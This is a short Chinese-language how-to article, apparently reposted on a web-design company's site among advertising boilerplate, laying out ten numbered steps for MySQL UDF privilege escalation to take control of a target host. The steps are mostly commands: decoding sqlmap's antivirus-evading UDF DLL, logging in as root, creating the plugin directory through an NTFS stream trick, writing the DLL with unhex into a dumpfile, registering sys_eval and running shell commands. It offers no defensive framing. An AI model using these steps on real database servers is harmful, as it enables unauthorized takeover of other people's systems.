本文主要給大家介紹MySQL中UDF提權(quán)獲取主機(jī)控制權(quán)的詳細(xì)步驟，文章內(nèi)容都是筆者用心摘選和編輯的，具有一定的針對性，對大家的參考意義還是比較大的，下面跟筆者一起了解下MySQL中UDF提權(quán)獲取主機(jī)控制權(quán)的詳細(xì)步驟吧。 

成都創(chuàng)新互聯(lián)公司專注為客戶提供全方位的互聯(lián)網(wǎng)綜合服務(wù)，包含不限于網(wǎng)站建設(shè)、網(wǎng)站制作、伊金霍洛網(wǎng)絡(luò)推廣、微信小程序開發(fā)、伊金霍洛網(wǎng)絡(luò)營銷、伊金霍洛企業(yè)策劃、伊金霍洛品牌公關(guān)、搜索引擎seo、人物專訪、企業(yè)宣傳片、企業(yè)代運(yùn)營等，從售前售中售后，我們都將竭誠為您服務(wù)，您的肯定，是我們最大的嘉獎；成都創(chuàng)新互聯(lián)公司為所有大學(xué)生創(chuàng)業(yè)者提供伊金霍洛建站搭建服務(wù)，24小時服務(wù)熱線：028-86922220，官方網(wǎng)址：chinadenli.net

1、python clock.py -d -i lib_mysqludfsys.dll

此步是獲取***用的UDF dll。首先要安裝sqlmap，然后運(yùn)行上述命令即可得到解碼之后的UDF dll。（sqlmap對其進(jìn)行編碼是為了免殺）

2、mysql -h target_ip -uroot -p

與目標(biāo)MySQL建立連接

3、select version();

查看MySQL版本

4、select @@basedir;

查看MySQL的安裝目錄。假設(shè)為 c:\program files\mysql\mysql server 5.1

5、select @@plugin_dir;

查看MySQL的插件目錄。假設(shè)為c:\program files\mysql\mysql server 5.1\plugin

6、select 'it is dll' into dumpfile 'c:\program files\mysql\mysql server 5.1\lib::$INDEX_ALLOCATION';

創(chuàng)建lib目錄

7、select  'it is dll' into dumpfile 'c:\program files\mysql\mysql server 5.1\plugin::$INDEX_ALLOCATION';

創(chuàng)建plugin目錄

8、select unhex('hex_of_udf.dll') into dumpfile "c:\program files\mysql\mysql server 5.1\plugin\udf.dll";

創(chuàng)建udf.dll，上述命令中hex_of_udf.dll是udf.dll的十六進(jìn)制文本，可用winhex等編輯軟件獲得

9、create function sys_eval returns string soname 'udf.dll';

創(chuàng)建函數(shù)

10、select sys_eval('whoami');
執(zhí)行shell命令，表明以獲取操作系統(tǒng)的控制權(quán)

看完以上關(guān)于MySQL中UDF提權(quán)獲取主機(jī)控制權(quán)的詳細(xì)步驟，很多讀者朋友肯定多少有一定的了解，如需獲取更多的行業(yè)知識信息 ，可以持續(xù)關(guān)注我們的行業(yè)資訊欄目的。 

文章名稱：MySQL中UDF提權(quán)獲取主機(jī)控制權(quán)的詳細(xì)步驟
文章起源：http://chinadenli.net/article36/gdpcsg.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供自適應(yīng)網(wǎng)站、App開發(fā)、搜索引擎優(yōu)化、ChatGPT、網(wǎng)站收錄、響應(yīng)式網(wǎng)站

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)